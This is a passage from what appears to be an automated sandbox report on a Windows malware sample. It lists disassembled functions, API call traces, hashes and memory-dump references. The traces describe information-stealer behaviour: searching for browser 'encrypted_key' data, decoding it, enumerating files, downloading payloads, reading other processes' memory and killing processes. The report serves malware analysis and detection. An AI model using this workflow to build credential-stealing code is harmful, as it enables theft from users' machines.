                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                      • String ID: image/jpeg
                                      • API String ID: 1264946473-3785015651
                                      • Opcode ID: 26b54789188ad47223c0ea7fe78f1c3889746bd2098d6cd526535228a948fd0a
                                      • Instruction ID: 01f9dd3f7f9b2661a05b7f9c8a4523f75b20f5732d6c68871d38b7780c6a80cb
                                      • Opcode Fuzzy Hash: 26b54789188ad47223c0ea7fe78f1c3889746bd2098d6cd526535228a948fd0a
                                      • Instruction Fuzzy Hash: 8B514675910208AFDB14EFB4DC89EFE77BCEF59751F004519F905D2250EB30A9498BA0
                                      Function 00302C70 Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00302C89
                                      • memset.MSVCRT ref: 00302C9C
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                      • lstrcat.KERNEL32(?,00000000), ref: 00302CCC
                                      • lstrcat.KERNEL32(?,02F45420), ref: 00302CE8
                                      • lstrcat.KERNEL32(?,?), ref: 00302CFC
                                      • lstrcat.KERNEL32(?,02F450D8), ref: 00302D10
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 002FBE30: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002FBE7D
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 00301000: GlobalAlloc.KERNEL32(00000000,?), ref: 0030100B
                                      • StrStrA.SHLWAPI(00000000,02F45438), ref: 00302DA5
                                      • GlobalFree.KERNEL32(00000000), ref: 00302E74
                                        • Part of subcall function 002F6CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6CF7
                                        • Part of subcall function 002F6CD0: LocalAlloc.KERNEL32(00000040,00000000,?,002F5AF2,00000000,?,?), ref: 002F6D06
                                        • Part of subcall function 002F6CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6D1D
                                        • Part of subcall function 002F6CD0: LocalFree.KERNEL32(?,?,002F5AF2,00000000,?,?), ref: 002F6D2C
                                        • Part of subcall function 002F6E90: memset.MSVCRT ref: 002F6EE7
                                        • Part of subcall function 002F6E90: LocalAlloc.KERNEL32(00000040,?), ref: 002F6F1E
                                      • lstrcat.KERNEL32(?,00000000), ref: 00302E1B
                                      • StrCmpCA.SHLWAPI(?,003101E9,?,?,?,?,000003E8), ref: 00302E35
                                      • lstrcat.KERNEL32(00000000,?), ref: 00302E50
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 00302E5C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3732263607-0
                                      • Opcode ID: e2a533184a77745b38d92381104c80319e774bcec615344ba7010661de74f1c8
                                      • Instruction ID: 55be5c1c6136b44cb12cca8260b4787b49beaf884005ef713272a0e96700d931
                                      • Opcode Fuzzy Hash: e2a533184a77745b38d92381104c80319e774bcec615344ba7010661de74f1c8
                                      • Instruction Fuzzy Hash: 246195B191120CABDB15EBA0CC99FEF777CAF54740F044568FA05A7181EB30A659CFA0
                                      Function 003010F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 96memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0030110A
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                      • wsprintfW.USER32 ref: 00301153
                                      • OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                      • CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID: %hs${r/${r/
                                      • API String ID: 3729781310-3226881146
                                      • Opcode ID: 7178b9f2a9b65ab675cc54f7415b8e201d90476129be1b9f802358576829c9b0
                                      • Instruction ID: d2f656d3e5c8dad3549f6151f96de3946a6286b4ec0c4556b1acb5122f60bb0a
                                      • Opcode Fuzzy Hash: 7178b9f2a9b65ab675cc54f7415b8e201d90476129be1b9f802358576829c9b0
                                      • Instruction Fuzzy Hash: 6A319371A01208BBEB25DBE0DC99FEE777CEF49740F104155FA05E61C0DB70AA458BA5
                                      Function 00309D90 Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileInformationByHandle.KERNEL32(?,?,?), ref: 00309D9F
                                      • GetFileSize.KERNEL32(?,00000000,?,?), ref: 00309E15
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00309E34
                                      • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00309E49
                                      • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00309E52
                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00309E61
                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00309E7F
                                      • ReadFile.KERNEL32(?,0030A367,00000004,?,00000000), ref: 00309E8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$PointerRead$HandleInformationSize
                                      • String ID:
                                      • API String ID: 2979504256-0
                                      • Opcode ID: f9f3305b62d8938ee285346d2919e37f29fe0c0c47e81a210a531a9ca342616c
                                      • Instruction ID: 3a80b495fe7da1e9f23044267c3f746d9cfe0b342e97f353e9841dbafd9dc7d4
                                      • Opcode Fuzzy Hash: f9f3305b62d8938ee285346d2919e37f29fe0c0c47e81a210a531a9ca342616c
                                      • Instruction Fuzzy Hash: 5351B471E02208ABEB25DF65CC91FAEB7B9EF84700F15851AE501A72C1D770AE41C794
                                      Function 002F4E90 Relevance: 15.1, APIs: 10, Instructions: 125networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F4ED3
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F4EEE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 002F4F13
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002F4F36
                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002F4F4F
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002F4F76
                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002F4FA0
                                      • CloseHandle.KERNEL32(00000000,?,00000400), ref: 002F4FBC
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4FC3
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4FCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 105467990-0
                                      • Opcode ID: 41e117c68b2dad2da629fef4f2bbc3f9bf464b9fb5fc9836ff9d53c3f57d4b53
                                      • Instruction ID: ae82f431f1ee8c8bffeb2123f420f4c66ecdf9a0511c10db30f89ba580c0a9be
                                      • Opcode Fuzzy Hash: 41e117c68b2dad2da629fef4f2bbc3f9bf464b9fb5fc9836ff9d53c3f57d4b53
                                      • Instruction Fuzzy Hash: F1416D71620209ABEB20EF70DD5AFBE736CEF54740F544128FB05A6191DB70AA19CB64
                                      Function 00305709 Relevance: 15.1, APIs: 10, Instructions: 115stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 0030571C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305736
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305774
                                      • lstrcat.KERNEL32(?,02F43188), ref: 00305788
                                      • lstrcat.KERNEL32(?,?), ref: 0030579C
                                      • lstrcat.KERNEL32(?,?), ref: 003057AA
                                      • lstrcat.KERNEL32(?,003101E0), ref: 003057BC
                                      • lstrcat.KERNEL32(?,?), ref: 003057D0
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00305863
                                      • FindClose.KERNEL32(00000000), ref: 00305872
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                      • String ID:
                                      • API String ID: 1847592606-0
                                      • Opcode ID: ce5e328944fafa080d46d2d4d5c490c905b41cdc004ddfce74bef7dfa52ec54f
                                      • Instruction ID: 35eac716c535c4e78befcd9778ff9a30f1fab540335749520179ea1849bdf38f
                                      • Opcode Fuzzy Hash: ce5e328944fafa080d46d2d4d5c490c905b41cdc004ddfce74bef7dfa52ec54f
                                      • Instruction Fuzzy Hash: 5A41BB7552120CABDB29EFA0DD99EFE733CAF54740F0485A8FA0592081EB709749CF61
                                      Function 002FF550 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 192COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 002FF561
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 002FF588
                                      • memset.MSVCRT ref: 002FF5E4
                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 002FF63C
                                      • memset.MSVCRT ref: 002FF6CF
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002FF5FA, 002FF6E8
                                      • N0ZWFt, xrefs: 002FF692
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
